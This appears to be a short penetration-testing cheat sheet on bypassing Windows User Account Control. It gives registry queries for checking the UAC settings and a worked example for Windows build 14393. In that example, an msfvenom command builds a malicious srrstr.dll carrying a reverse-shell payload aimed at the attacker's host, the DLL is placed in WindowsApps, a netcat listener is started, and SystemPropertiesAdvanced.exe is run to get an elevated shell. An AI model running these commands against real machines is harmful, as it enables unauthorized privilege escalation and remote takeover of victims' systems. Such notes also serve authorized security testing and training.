User Account Control (UAC) Bypass
UAC bypasses leverage flaws or unintended functionality in different Windows builds.
The following repository contains many different UAC Bypassing Techniques: https://github.com/hfiref0x/UACME
Initial Enumeration
Check if UAC is enabled (0x1=true): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Check the UAC level(0x5=max level): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
To check the Windows Build: [environment]::OSVersion.Version
Check this repository and see if anything exists for the target build number
Example - UAC Bypass in Windows Build 14393
We can basically bypass UAC by placing a malicious
srrstr.dll
DLL to theWindowsApps
folder, which will be loaded in an elevated contextGenerate malicious DLL file:
msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll
Transfer the DLL on the target machine
Start a netcat listener on the attacker machine:
nc -lvnp 4444
Get a reverse shell:
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
Last updated